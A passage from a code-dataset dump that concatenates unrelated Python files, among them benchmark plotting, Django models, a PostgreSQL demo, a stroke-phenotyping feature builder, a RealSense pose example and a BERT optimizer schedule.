def try_cast(text): return int(text) if text.isdigit() else text
return [try_cast(c) for c in split('(\d+)', text)]
def _tps(self, data):
values = findall(r' TPS: (\d+) \+/- (\d+)', data)
values = [(int(x), int(y)) for x, y in values]
return list(zip(*values))
def _latency(self, data, scale=1):
values = findall(r' Latency: (\d+) \+/- (\d+)', data)
values = [(float(x)/scale, float(y)/scale) for x, y in values]
return list(zip(*values))
def _variable(self, data):
return [int(x) for x in findall(r'Variable value: X=(\d+)', data)]
def _plot(self, x_label, y_label, y_axis, z_axis, type, y_max=None):
plt.figure(figsize=(6.4, 2.4))
markers = cycle(['o', 'v', 's', 'p', 'D', 'P'])
self.results.sort(key=self._natural_keys, reverse=(type == 'tps'))
for result in self.results:
y_values, y_err = y_axis(result)
x_values = self._variable(result)
if len(y_values) != len(y_err) or len(y_err) != len(x_values):
raise PlotError('Unequal number of x, y, and y_err values')
plt.errorbar(
x_values, y_values, yerr=y_err, label=z_axis(result),
linestyle='dotted', marker=next(markers), capsize=3
)
plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1), ncol=2)
plt.xlim(xmin=0)
plt.ylim(bottom=0, top=y_max)
plt.xlabel(x_label, fontweight='bold')
plt.ylabel(y_label[0], fontweight='bold')
plt.xticks(weight='bold')
plt.yticks(weight='bold')
plt.grid()
ax = plt.gca()
ax.xaxis.set_major_formatter(default_major_formatter)
ax.yaxis.set_major_formatter(default_major_formatter)
if 'latency' in type:
ax.yaxis.set_major_formatter(sec_major_formatter)
for x in ['pdf', 'png']:
plt.savefig(PathMaker.plot_file(type, x), bbox_inches='tight')
@staticmethod
def nodes(data):
batch_size = search(r'Batch size: (\d+)', data).group(1)
x = search(r'Committee size: (\d+)', data).group(1)
f = search(r'Faults: (\d+)', data).group(1)
faults = f' - {f} faulty' if f != '0' else ''
return f'{x} nodes (batch size: {batch_size}){faults}'
@staticmethod
def shards(data):
x = search(r'Shards per node: (\d+)', data).group(1)
f = search(r'Faults: (\d+)', data).group(1)
faults = f'({f} faulty)' if f != '0' else ''
return f'{x} shards {faults}'
@staticmethod
def max_latency(data):
x = search(r'Max latency: (\d+)', data).group(1)
f = search(r'Faults: (\d+)', data).group(1)
faults = f'({f} faulty)' if f != '0' else ''
# return f'Max latency: {float(x) / 1000:,.1f} s {faults}'
return f'Latency cap: {int(x):,} ms {faults}'
@classmethod
def plot_latency(cls, files, scalability, y_max=None):
assert isinstance(files, list)
assert all(isinstance(x, str) for x in files)
z_axis = cls.shards if scalability else cls.nodes
x_label = 'Throughput (tx/s)'
y_label = ['Latency (s)']
ploter = cls(files)
ploter._plot(
x_label, y_label, ploter._latency, z_axis, 'latency', y_max
)
@classmethod
def plot_tps(cls, files, scalability):
assert isinstance(files, list)
assert all(isinstance(x, str) for x in files)
z_axis = cls.max_latency
x_label = 'Shards per authority' if scalability else 'Committee size'
y_label = ['Throughput (tx/s)']
ploter = cls(files)
ploter._plot(x_label, y_label, ploter._tps, z_axis, 'tps', y_max=None)
@classmethod
def plot(cls, params_dict):
try:
params = PlotParameters(params_dict)
except PlotError as e:
raise PlotError('Invalid nodes or bench parameters', e)
# Aggregate the logs.
LogAggregator(params.max_latency).print()
# Make the latency, tps, and robustness graphs.
iterator = params.shards if params.scalability() else params.nodes
latency_files, tps_files = [], []
for f in params.faults:
for x in iterator:
latency_files += glob(
PathMaker.agg_file(
'latency',
f,
x if not params.scalability() else params.nodes[0],
x if params.scalability() else params.shards[0],
params.collocate,
'any',
params.batch_size,
)
)
for l in params.max_latency:
tps_files += glob(
PathMaker.agg_file(
'tps',
f,
'x' if not params.scalability() else params.nodes[0],
'x' if params.scalability() else params.shards[0],
params.collocate,
'any',
params.batch_size,
max_latency=l,
)
)
y_max = 30_000
cls.plot_latency(latency_files, params.scalability(), y_max)
cls.plot_tps(tps_files, params.scalability())
| StarcoderdataPython |
3253304 | <reponame>spacesmap/2
from django.db import models
from django.utils.translation import ugettext_lazy as _
CITY_LEVEL_TYPE = (
(0, _("China")),
(1, _("Province")),
(2, _("City")),
(3, _("Country")),
)
class City(models.Model):
CHINA = 0
PROVINCE = 1
CITY = 2
COUNTRY = 3
name = models.CharField(_('Name'), max_length=40)
short_name = models.CharField(_('Short name'), max_length=40)
level_type = models.PositiveIntegerField(_('Level type'),
choices=CITY_LEVEL_TYPE)
city_code = models.CharField(_('City code'), max_length=7)
zip_code = models.CharField(_('Zip code'), max_length=7)
lat = models.CharField(_('Latitude'), max_length=20)
lng = models.CharField(_('Longitude'), max_length=20)
pinyin = models.CharField(_('Chinese Pinyin'), max_length=40)
status = models.BooleanField(_('status'), default=True)
parent = models.ForeignKey('self', null=True)
def __str__(self):
return self.name
| StarcoderdataPython |
1643924 | <filename>note24/order_system (3)/src/order_system_pkg/Promotion.py
#######################################################
#
# Promotion.py
# Python implementation of the Class Promotion
# Generated by Enterprise Architect
# Created on: 20-4��-2021 13:21:58
# Original author: 70748
#
#######################################################
from abc import ABC, abstractmethod
# from .Order import Order
class Promotion(ABC):
@abstractmethod
def discount(self, order: "Order"):
pass
| StarcoderdataPython |
81485 | <reponame>mattkw/dl<filename>adv/linyou.py.z.py
import adv_test
import linyou
import slot.d.wind
def module():
return Linyou_best
class Linyou_best(linyou.Linyou):
name = 'Linyou'
comment = '2in1 ; Zephyr'
def pre(this):
pass
if __name__ == '__main__':
conf = {}
# a better acl, but hit threshold of lose one s3.
conf['acl'] = """
`s2, s1.charged>=s1.sp-440
`s1
`s2, seq=4
`s3, seq=5
"""
adv_test.test(module(), conf, verbose=0, mass=0)
| StarcoderdataPython |
1785998 | <reponame>vincenzodentamaro/music_genre_classification
import json
from glob import glob
import numpy as np
from sklearn.metrics import f1_score, average_precision_score
from sklearn.model_selection import train_test_split
from models import rnn_classifier, transformer_classifier
from prepare_data import get_id_from_path, labels_to_vector, random_crop
from tqdm import tqdm
import matplotlib.pyplot as plt
from sklearn.metrics import precision_recall_curve
def chunker(seq, size):
return (seq[pos : pos + size] for pos in range(0, len(seq), size))
if __name__ == "__main__":
from collections import Counter
transformer_h5 = "transformer.h5"
transformer_v2_h5 = "transformer_v2.h5"
rnn_h5 = "rnn.h5"
batch_size = 128
epochs = 5
CLASS_MAPPING = json.load(open("/media/ml/data_ml/fma_metadata/mapping.json"))
id_to_genres = json.load(open("/media/ml/data_ml/fma_metadata/tracks_genre.json"))
id_to_genres = {int(k): v for k, v in id_to_genres.items()}
base_path = "/media/ml/data_ml/fma_large"
files = sorted(list(glob(base_path + "/*/*.npy")))
files = [x for x in files if id_to_genres[int(get_id_from_path(x))]]
labels = [id_to_genres[int(get_id_from_path(x))] for x in files]
print(len(labels))
samples = list(zip(files, labels))
strat = [a[-1] for a in labels]
cnt = Counter(strat)
strat = [a if cnt[a] > 2 else "" for a in strat]
train, val = train_test_split(
samples, test_size=0.2, random_state=1337, stratify=strat
)
transformer_model = transformer_classifier(n_classes=len(CLASS_MAPPING))
transformer_v2_model = transformer_classifier(n_classes=len(CLASS_MAPPING))
rnn_model = rnn_classifier(n_classes=len(CLASS_MAPPING))
transformer_model.load_weights(transformer_h5)
transformer_v2_model.load_weights(transformer_v2_h5)
rnn_model.load_weights(rnn_h5)
all_labels = []
transformer_all_preds = []
transformer_v2_all_preds = []
rnn_all_preds = []
for batch_samples in tqdm(
chunker(val, size=batch_size), total=len(val) // batch_size
):
paths, labels = zip(*batch_samples)
all_labels += [labels_to_vector(x, CLASS_MAPPING) for x in labels]
crop_size = np.random.randint(128, 256)
repeats = 16
transformer_Y = 0
transformer_v2_Y = 0
rnn_Y = 0
for _ in range(repeats):
X = np.array([random_crop(np.load(x), crop_size=crop_size) for x in paths])
transformer_Y += transformer_model.predict(X) / repeats
transformer_v2_Y += transformer_v2_model.predict(X) / repeats
rnn_Y += rnn_model.predict(X) / repeats
transformer_all_preds.extend(transformer_Y.tolist())
transformer_v2_all_preds.extend(transformer_v2_Y.tolist())
rnn_all_preds.extend(rnn_Y.tolist())
T_Y = np.array(transformer_all_preds)
T_v2_Y = np.array(transformer_v2_all_preds)
R_Y = np.array(rnn_all_preds)
Y = np.array(all_labels)
trsf_ave_auc_pr = 0
trsf_v2_ave_auc_pr = 0
rnn_ave_auc_pr = 0
total_sum = 0
for label, i in CLASS_MAPPING.items():
if np.sum(Y[:, i]) > 0:
trsf_auc = average_precision_score(Y[:, i], T_Y[:, i])
trsf_v2_auc = average_precision_score(Y[:, i], T_v2_Y[:, i])
rnn_auc = average_precision_score(Y[:, i], R_Y[:, i])
print(label, np.sum(Y[:, i]))
print("transformer :", trsf_auc)
print("transformer v2:", trsf_v2_auc)
print("rnn :", rnn_auc)
print("")
trsf_ave_auc_pr += np.sum(Y[:, i]) * trsf_auc
trsf_v2_ave_auc_pr += np.sum(Y[:, i]) * trsf_v2_auc
rnn_ave_auc_pr += np.sum(Y[:, i]) * rnn_auc
total_sum += np.sum(Y[:, i])
if label == "Hip-Hop":
precision, recall, _ = precision_recall_curve(Y[:, i], T_Y[:, i])
average_precision = average_precision_score(Y[:, i], T_Y[:, i])
plt.figure()
plt.step(recall, precision, where="post")
plt.xlabel("Recall")
plt.ylabel("Precision")
plt.ylim([0.0, 1.05])
plt.xlim([0.0, 1.0])
plt.title("Average precision score ".format(average_precision))
plt.savefig("plot.png")
trsf_ave_auc_pr /= total_sum
trsf_v2_ave_auc_pr /= total_sum
rnn_ave_auc_pr /= total_sum
print("transformer micro-average : ", trsf_ave_auc_pr)
print("transformer v2 micro-average : ", trsf_v2_ave_auc_pr)
print("rnn micro-average : ", rnn_ave_auc_pr)
| StarcoderdataPython |
1758396 | from kolibri.utils.cli import main
if __name__ == "__main__":
main(["start","--port=80","--foreground"])
| StarcoderdataPython |
3300729 | <gh_stars>0
from django.contrib import admin
from django.contrib import messages
from .models import IncludeBootstrap
from django.conf import settings
class IncludeBootstrapAdmin(admin.ModelAdmin):
fields = ('library', 'version', 'url_pattern', 'integrity', 'url', 'active')
readonly_fields = ('integrity', 'url')
list_display = ('library', 'version', 'active')
def save_model(self, request, obj, form, change):
if obj.active and obj.__class__.objects.filter(library=obj.library, active=obj.active).exists():
obj.__class__.objects.filter(library=obj.library, active=obj.active).update(active=False)
messages.add_message(request, messages.WARNING,
f'Please note! The object was activated and another library was deactivated.')
super().save_model(request, obj, form, change)
if getattr(settings, 'INCLUDE_BOOTSTRAP_SETTINGS', {}) and settings.INCLUDE_BOOTSTRAP_SETTINGS.get('use_db'):
admin.site.register(IncludeBootstrap, IncludeBootstrapAdmin)
| StarcoderdataPython |
117075 | # Imports
from django.contrib import admin
from django.urls import path, include
# BEGIN
urlpatterns = [
path('admin/', admin.site.urls),
path('watchdog/', include('watchdog.urls')),
path('dashboard/', include('dashboard.urls')),
path('smarttasks/', include('smarttasks.urls')),
path('nursehouse/', include('nursehouse.urls')),
path('error/', include('error.urls')),
]
# END
if __name__ == '__main__':
pass | StarcoderdataPython |
130212 | <gh_stars>0
from src import core
if __name__ == "__main__":
n = core.FrequencyDbName.DAILY
assert n == "daily"
print(n)
print(repr(n))
x = core.FrequencyDbName("todo")
| StarcoderdataPython |
3345108 | <gh_stars>0
sns.pairplot(df)
corre=df.corr()
plt.figure(figsize=(5,5))
sns.heatmap(corre,cmap='plasma')
plt.title('correlations')
plt.show()
sns.violinplot(y='gender',x='height',data=df , color="0.8" )
sns.stripplot(y='gender',x='height',data=df , zorder=1 )
plt.show()
sns.violinplot(y='smoker_nonsmoker',x='height',data=df , color="0.8" )
sns.stripplot(y='smoker_nonsmoker',x='height',data=df , zorder=1 )
plt.show()
#Not normal (do the normality test if you want). So no t test. Let's go for non parametric
stat , pval = stats.mannwhitneyu( df.height[df.gender=='M'] ,
df.height[df.gender=='F'] )
print('Mann-Whitney rank test p-value for gender :' , pval)
stat , pval = stats.mannwhitneyu( df.height[df.smoker_nonsmoker=='NS'] ,
df.height[df.smoker_nonsmoker=='S'] )
print('Mann-Whitney rank test p-value for smoker :' , pval)
sns.violinplot(y='birth_place',x='height',data=df , color="0.8" )
sns.stripplot(y='birth_place',x='height',data=df , zorder=1 )
plt.show()
#Under represented labels : not a good feature
sns.violinplot(y='hair_colour',x='height',data=df , color="0.8" )
sns.stripplot(y='hair_colour',x='height',data=df , zorder=1 )
plt.show()
sns.violinplot(y='eye_colour',x='height',data=df , color="0.8" )
sns.stripplot(y='eye_colour',x='height',data=df , zorder=1 )
plt.show()
sns.violinplot(y='diet',x='height',data=df , color="0.8" )
sns.stripplot(y='diet',x='height',data=df , zorder=1 )
plt.show()
#Again, no ANOVA for us here
print('Kruskal test for hair colour')
stats.kruskal(df.height[df.hair_colour=='lb'] , df.height[df.hair_colour=='db'], df.height[df.hair_colour=='bl'])
print('Kruskal test for eye colour')
stats.kruskal(df.height[df.eye_colour=='1'] , df.height[df.eye_colour=='2'], df.height[df.eye_colour=='3'], df.height[df.eye_colour=='4'])
print('Kruskal test for diet')
stats.kruskal(df.height[df.diet=='1'] , df.height[df.diet=='2'], df.height[df.diet=='3'], df.height[df.diet=='4'])
corre=df.corr(method='pearson')
from scipy.stats import kendalltau, pearsonr, spearmanr
def kendall_pval(x,y):
return kendalltau(x,y)[1]
def pearsonr_pval(x,y):
return pearsonr(x,y)[1]
def spearmanr_pval(x,y):
return spearmanr(x,y)[1]
corre_pval=df.corr(method=pearsonr_pval)
df_corr_pval = pd.DataFrame(corre_pval,columns=corre.columns)
import statsmodels.stats.multitest as ssm
corre_pval_adj=np.array([list(ssm.multipletests([np.array(corre_pval)[i][j]if j!=i else 1 for j in range(np.array(corre_pval).shape[1])]
,alpha=0.05,method='fdr_bh',is_sorted=False,returnsorted=False)[1])
for i in range(np.array(corre_pval).shape[0])])
df_corr_pval_adj = pd.DataFrame(corre_pval_adj,columns=corre.columns)
dico_columns={j:i for i,j in enumerate(list(df_corr_pval_adj.columns))}
oo=['height','shoe_size','weight','R_wrist_girth','L_wrist_girth',
'nb_siblings_M','nb_siblings','nb_siblings_F','height_M','height_F']
new_dico_columns={j:i for i,j in enumerate(oo)}
dico_swap={dico_columns[s]:new_dico_columns[s] for s in dico_columns.keys()}
dico_swap={new_dico_columns[s]:dico_columns[s] for s in dico_columns.keys()}
the_matrix2=np.array(df_corr_pval_adj)
the_matrix=np.array([[the_matrix2[dico_swap[i],dico_swap[j]] for j in range(len(the_matrix2))]for i in range(len(the_matrix2))])
def highlight_cell(x,y, ax=None, **kwargs):
rect = plt.Rectangle((x-.5, y-.5), 1,1, fill=False, **kwargs)
ax = ax or plt.gca()
ax.add_patch(rect)
return rect
a=sns.clustermap(corre,z_score=None,row_cluster=True,col_cluster=True,method='ward',cmap='coolwarm',
vmax=1,vmin=-1, annot=True, annot_kws={"size": 15})
a.ax_heatmap.set_title('Clustered pearson correlation\nbetween covariables',pad=100)
b=a.ax_heatmap
pp=0
for i in range(len(the_matrix)):
for j in range(len(the_matrix)):
if the_matrix[i][j]<0.05:
if pp==0:
highlight_cell(i+0.5,j+0.5,ax=b,color='k',linewidth=3,label='Significant multiple\ntesting adjusted pvalue<0.05')
else:
highlight_cell(i+0.5,j+0.5,ax=b,color='k',linewidth=3)
pp+=1
b.legend(loc='best', bbox_to_anchor=(1, 0.8, 0.8, 0.5))
plt.show()
sns.violinplot(y='gender',x='shoe_size',data=df , color="0.8" )
sns.stripplot(y='gender',x='shoe_size',data=df , zorder=1 )
plt.show()
sns.violinplot(y='diet',x='shoe_size',data=df , color="0.8" )
sns.stripplot(y='diet',x='shoe_size',data=df , zorder=1 )
plt.show()
print('Kruskal test for diet vs shoe size')
stats.kruskal(df.shoe_size[df.diet=='1'] , df.shoe_size[df.diet=='2'], df.shoe_size[df.diet=='3'], df.shoe_size[df.diet=='4'])
print('Kruskal test for diet vs height')
stats.kruskal(df.height_M[df.diet=='1'] , df.height_M[df.diet=='2'], df.height_M[df.diet=='3'], df.height_M[df.diet=='4'])
ordered_loglike=[]
for p in ['shoe_size','height_M','nb_siblings_F']:
model=smf.ols(formula='height ~ '+p, data=df)
results = model.fit()
res=results.summary()
print(res)
#### a little bit of gymnastic to get this summary saved and usable.
results_as_html = res.tables[0].as_html()
result_general_df2=pd.read_html(results_as_html, header=0, index_col=0)[0]
list1=["Dep. Variable:"]+list(result_general_df2.index)+[result_general_df2.columns[1]]+list(result_general_df2[result_general_df2.columns[1]])
list2=[result_general_df2.columns[0]]+list(result_general_df2[result_general_df2.columns[0]])+[result_general_df2.columns[2]]+list(result_general_df2[result_general_df2.columns[2]])
dico_i={s:v for s,v in zip(list1,list2)}
result_general_df=pd.DataFrame([[dico_i[v]] for v in list1],index=list1,columns=['Value'])
results_as_html = res.tables[1].as_html()
result_fit_df=pd.read_html(results_as_html, header=0, index_col=0)[0]
ordered_loglike.append([p,float(result_general_df['Value']["Log-Likelihood:"]),result_fit_df])
ordered_loglike=sorted(ordered_loglike,key=itemgetter(1),reverse=True)
print([v[0] for v in ordered_loglike])
list_co=[]
ordered_loglike_multi=[]
for p in [v[0] for v in ordered_loglike]:
list_co.append(p)
model=smf.ols(formula='height ~ '+'+'.join(list_co), data=df)
results = model.fit()
res=results.summary()
print(res)
#### a little bit of gymnastic to get this summary saved and usable.
results_as_html = res.tables[0].as_html()
result_general_df2=pd.read_html(results_as_html, header=0, index_col=0)[0]
list1=["Dep. Variable:"]+list(result_general_df2.index)+[result_general_df2.columns[1]]+list(result_general_df2[result_general_df2.columns[1]])
list2=[result_general_df2.columns[0]]+list(result_general_df2[result_general_df2.columns[0]])+[result_general_df2.columns[2]]+list(result_general_df2[result_general_df2.columns[2]])
dico_i={s:v for s,v in zip(list1,list2)}
result_general_df=pd.DataFrame([[dico_i[v]] for v in list1],index=list1,columns=['Value'])
results_as_html = res.tables[1].as_html()
result_fit_df=pd.read_html(results_as_html, header=0, index_col=0)[0]
ordered_loglike_multi.append(['_'.join(list_co),float(result_general_df['Value']["Log-Likelihood:"]),result_fit_df])
ordered_loglike_multi=sorted(ordered_loglike_multi,key=itemgetter(1),reverse=True)
print()
print('Modles',[v[0] for v in ordered_loglike_multi])
print('Log-Likelihood',[v[1] for v in ordered_loglike_multi])
print()
ordered_log_name=[v[0] for v in ordered_loglike_multi][::-1]
ordered_log_value=[v[1] for v in ordered_loglike_multi][::-1]
for i in range(1,len(ordered_log_value)):
pval=1-stats.chi2.cdf(2*(ordered_log_value[i]-ordered_log_value[i-1]),1)
print("The log likelihood difference between model {0} and model {1} \n is associated to a P value={2}".format(ordered_log_name[i-1],ordered_log_name[i],pval))
print() | StarcoderdataPython |
11349 | <reponame>catcherwong-archive/2019<gh_stars>10-100
# -*- coding: UTF-8 -*-
import psycopg2 #postgresql
import time
import datetime
class PgDemo:
def __init__(self, host, port, db, user, pwd):
self.host = host
self.port = port
self.db = db
self.user = user
self.pwd = <PASSWORD>
def getConnection(self):
conn = None
try:
conn = psycopg2.connect(
host=self.host,
port=self.port,
database=self.db,
user=self.user,
password=self.pwd,
)
except Exception as err:
print("can not connect to the database,%s" % err)
return conn
def query_all(self):
with self.getConnection() as conn:
sql = "select id, name, gender, create_time from t1"
try:
cur = conn.cursor()
cur.execute(sql)
res = cur.fetchall()
# print(res)
print("id\tname\tgender\ttime")
for d in res:
print("%d\t%s\t%s\t%s" % (d[0], d[1], "male" if d[2] == 1 else "female", self.timestamp2datetime(d[3], False)))
except Exception as err:
print("query all fail, %s" % err)
finally:
cur.close()
def query_lastone(self):
with self.getConnection() as conn:
sql = "select id, name, gender, create_time from t1 order by create_time desc limit 1"
try:
cur = conn.cursor()
cur.execute(sql)
res = cur.fetchone()
# print(res)
print("id\tname\tgender\ttime")
print("%d\t%s\t%s\t%s" % (res[0], res[1], "male" if res[2] == 1 else "female", self.timestamp2datetime(res[3], False)))
except Exception as err:
print("query lastone fail, %s" % err)
finally:
cur.close()
def query_byname(self, name):
with self.getConnection() as conn:
sql = "select id, name, gender, create_time from t1 where name = %s"
try:
cur = conn.cursor()
cur.execute(sql, (name, ))
res = cur.fetchone()
# print(res)
print("id\tname\tgender\ttime")
print("%d\t%s\t%s\t%s" % (res[0], res[1], "male" if res[2] == 1 else "female", self.timestamp2datetime(res[3], False)))
except Exception as err:
print("query by name fail, %s" % err)
finally:
cur.close()
def insert_one(self, name, gender):
with self.getConnection() as conn:
sql = " insert into t1(name, gender, create_time) values(%s, %s, %s) "
try:
cur = conn.cursor()
cur.execute(sql, (name, gender, self.getCurrentTimestamp()))
print("insert ok")
except Exception as err:
print("insert one fail, %s" % err)
finally:
cur.close()
def update_genderbyid(self, id, gender):
with self.getConnection() as conn:
sql = " update t1 set gender = %s where id = %s "
try:
cur = conn.cursor()
cur.execute(sql, (gender, id))
print("update ok")
except Exception as err:
print("update gender by id fail, %s" % err)
finally:
cur.close()
def delete_byname(self, name):
with self.getConnection() as conn:
sql = " delete from t1 where name = %s "
try:
cur = conn.cursor()
cur.execute(sql, (name, ))
print("delete ok")
except Exception as err:
print("delete by name fail, %s" % err)
finally:
cur.close()
def getCurrentTimestamp(self):
ts = int ( round ( time.time() * 1000 ) )
print(ts)
return ts
def timestamp2datetime(self, timestamp, issecond):
if(issecond == True):
t = datetime.datetime.fromtimestamp(timestamp)
return t.strftime("%Y-%m-%d %H:%M:%S")
else:
t = datetime.datetime.fromtimestamp(timestamp / 1000)
return t.strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
if __name__ == "__main__":
pg = PgDemo("127.0.0.1", 5432, "demo", "postgres", "123456")
print("===========insert_one==============")
pg.insert_one("wong", 1)
print("===========query_all==============")
pg.query_all()
print("===========query_lastone==============")
pg.query_lastone()
print("===========query_byname==============")
pg.query_byname("catcher")
print("===========update_genderbyid==============")
pg.update_genderbyid(4, 2)
print("===========delete_byname==============")
pg.delete_byname("wong")
print("===========query_all==============")
pg.query_all()
| StarcoderdataPython |
3218878 | <reponame>pthangaraj/Stroke-Phenotyping
#By <NAME> (<EMAIL>), <NAME> Lab at Columbia University Irving Medical Center
#Part of manuscript: "Comparative analysis, applications, and interpretation of electronic health record-based stroke phenotyping methods"
#This script makes the training matrix with collapsed features
import numpy as np
import os
import csv
import sys
import MySQLdb
import scipy.stats as stats
from collections import defaultdict
import scipy as sp
from scipy import stats
from sklearn.externals import joblib
from sklearn import metrics
from sklearn import ensemble
from sklearn import linear_model
from sklearn import model_selection
from sklearn import preprocessing
from sklearn import svm
from scipy.sparse import csr_matrix
import pickle
import time
import datetime
from datetime import date
e2e={}
case=sys.argv[1]
control=sys.argv[2]
model=sys.argv[3]
print "new loop start", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
def credential():
'''import login and passwrd from credential text file'''
reader=csv.reader(open({credentials filename}),delimiter = ",")
for login, password in reader:
login=login
passwd=password
return login, passwd
login,passwd=credential()
print "first entrance to mysql", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
db = MySQLdb.connect(host={host}, user ='%s' % (login), passwd='%s' % (passwd), db={database}, port={poat})
c = db.cursor()
cid2icd=dict()
cond_file={condition events filename}+case+control+'.npy'
cond_events=np.load(cond_file)
cond_events=cond_events.tolist()
#gather ICD9 or ICD10 codes of conditions
SQL='''select condition_source_value icd, condition_source_concept_id cid from {condition occurrence table} where condition_source_concept_id in %s''' %str(tuple(cond_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
#snomed concept id,
for cond in cond_events:
if cond in cid2icd.keys():
cond=cid2icd[cond]
ocond=cond
if cond[0:3]=='I9:':
print cond
cond=cond.split(':')[1]
elif cond[0:4]=='I10:':
cond=cond.split(':')[1]
e2e[cond]=ocond
proc_file={procedure events filename}+case+control+'.npy'
proc_events=np.load(proc_file)
proc_events=proc_events.tolist()
#Gather ICD9 or ICD10 codes of procedures
SQL='''select procedure_source_value icd, procedure_source_concept_id cid from {procedure occurrence table} where procedure_source_concept_id in %s''' %str(tuple(proc_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
for proc in proc_events:
if proc in cid2icd.keys():
proc=cid2icd[proc]
oproc=proc
if proc[0:3]=='I9:':
proc=proc.split(':')[1]
elif proc[0:4]=='I10:':
proc=proc.split(':')[1]
elif proc[0:3]=='C4:':
proc=proc.split(':')[1]
e2e[proc]=oproc
e2e_file={events2uniformevents filename}+case+control+'.npy'
np.save(e2e_file,e2e)
drug_file={drug era events filename}+case+control+'.npy'
drug_events=np.load(drug_file)
drug_events=drug_events.tolist()
e2i_file={events2cols filename}+case+control+'.npy'
e2i=np.load(e2i_file)
e2i=e2i[()]
matrix_file={training_set matrix filename} + case + control + '.npz'
matrix=sp.sparse.load_npz(matrix_file).toarray()
#load dictionary of feature collapsing models based on CCS+ATC combination
dictfile=model+'2code.npy'
ccs2code=np.load(dictfile)
ccs2code=ccs2code[()]
if model=='cat':
model2='chem_substrs'
if model=='lvl1_':
model2='anatoms'
if model=='lvl2_':
model2='pharm_subgrps'
drugdictfile=model2+'2code.npy'
drug2code=np.load(drugdictfile)
drug2code=drug2code[()]
demo_file={demographics filename}+case+control+'.npy'
demo_events=np.load(demo_file)
demo_events=demo_events.tolist()
#matrix of collapsed features
model_mat=np.zeros(shape=(matrix.shape[0],len(ccs2code.keys())+len(drug2code.keys())+len(demo_events))).astype('int8')
keys=ccs2code.keys()
for i in range(0,len(keys)):
events=ccs2code[keys[i]]
for e in events:
if e in e2e.keys():
if e2e[e] in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e2e[e]])]
dkeys=drug2code.keys()
for i in range(len(keys),len(keys)+len(dkeys)):
events=drug2code[dkeys[i-len(keys)]]
for e in events:
if e in drug_events:
if e in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e])]
#add demo events
for i in range(len(keys)+len(dkeys),len(keys)+len(dkeys)+len(demo_events)):
events=demo_events
for e in events:
if e in e2i.keys():
model_mat[:,i]=matrix[:,int(e2i[e])]
C_val = 1
examples=csr_matrix(model_mat)
mat_file={insert matrix filename}+model+model2+case+control+'.npz'
sp.sparse.save_npz(mat_file,examples)
print "end", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
| StarcoderdataPython |
1679111 | #!/usr/bin/python
# -*- coding: utf-8 -*-
## License: Apache 2.0. See LICENSE file in root directory.
## Copyright(c) 2019 Intel Corporation. All Rights Reserved.
#####################################################
## librealsense T265 rpy example ##
#####################################################
# First import the library
import pyrealsense2 as rs
import math as m
# Declare RealSense pipeline, encapsulating the actual device and sensors
pipe = rs.pipeline()
# Build config object and request pose data
cfg = rs.config()
cfg.enable_stream(rs.stream.pose)
# Start streaming with requested config
pipe.start(cfg)
try:
while (True):
# Wait for the next set of frames from the camera
frames = pipe.wait_for_frames()
# Fetch pose frame
pose = frames.get_pose_frame()
if pose:
# Print some of the pose data to the terminal
data = pose.get_pose_data()
# Euler angles from pose quaternion
# See also https://github.com/IntelRealSense/librealsense/issues/5178#issuecomment-549795232
# and https://github.com/IntelRealSense/librealsense/issues/5178#issuecomment-550217609
w = data.rotation.w
x = -data.rotation.z
y = data.rotation.x
z = -data.rotation.y
pitch = -m.asin(2.0 * (x*z - w*y)) * 180.0 / m.pi;
roll = m.atan2(2.0 * (w*x + y*z), w*w - x*x - y*y + z*z) * 180.0 / m.pi;
yaw = m.atan2(2.0 * (w*z + x*y), w*w + x*x - y*y - z*z) * 180.0 / m.pi;
print("Frame #{}".format(pose.frame_number))
print("RPY [deg]: Roll: {0:.7f}, Pitch: {1:.7f}, Yaw: {2:.7f}".format(roll, pitch, yaw))
finally:
pipe.stop() | StarcoderdataPython |
113766 | <reponame>Tongjilibo/bert4torch
import math
from typing import Callable, Iterable, Optional, Tuple, Union
import torch
from torch.optim import Optimizer
from torch.optim.lr_scheduler import LambdaLR
def get_linear_schedule_with_warmup(optimizer, num_warmup_steps, num_training_steps, last_epoch=-1):
"""
带warmup的schedule
参数
num_warmup_steps:
需要warmup的步数,一般为 num_training_steps * warmup_proportion(warmup的比例,建议0.05-0.15)
num_training_steps:
总的训练步数,一般为 train_batches * num_epoch
"""
def lr_lambda(current_step: int):
if current_step < num_warmup_steps:
return float(current_step) / float(max(1, num_warmup_steps))
return max(
0.0, float(num_training_steps - current_step) / float(max(1, num_training_steps - num_warmup_steps))
)
return LambdaLR(optimizer, lr_lambda, last_epoch)
class AdamW(Optimizer):
"""
带权重衰减的Adam
<https://arxiv.org/abs/1711.05101>`__.
参数:
params (:obj:`Iterable[torch.nn.parameter.Parameter]`):
lr (:obj:`float`, `optional`, defaults to 1e-3):
学习率.
betas (:obj:`Tuple[float,float]`, `optional`, defaults to (0.9, 0.999)):
Adam的betas参数 (b1, b2)
eps (:obj:`float`, `optional`, defaults to 1e-6):
Adam的epsilon参数,用于数值稳定性
weight_decay (:obj:`float`, `optional`, defaults to 0):
权重衰减参数
correct_bias (:obj:`bool`, `optional`, defaults to `True`):
修正Adm的bias (原始的tf版本的bert,没有修正bias,取值为False,但是可以尝试用True,可能会收敛更稳定)
例子:
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer
if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer
if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=1e-5, correct_bias=False)
"""
def __init__(
self,
params: Iterable[torch.nn.parameter.Parameter],
lr: float = 1e-3,
betas: Tuple[float, float] = (0.9, 0.999),
eps: float = 1e-6,
weight_decay: float = 0.0,
correct_bias: bool = True,
):
if lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr} - should be >= 0.0")
if not 0.0 <= betas[0] < 1.0:
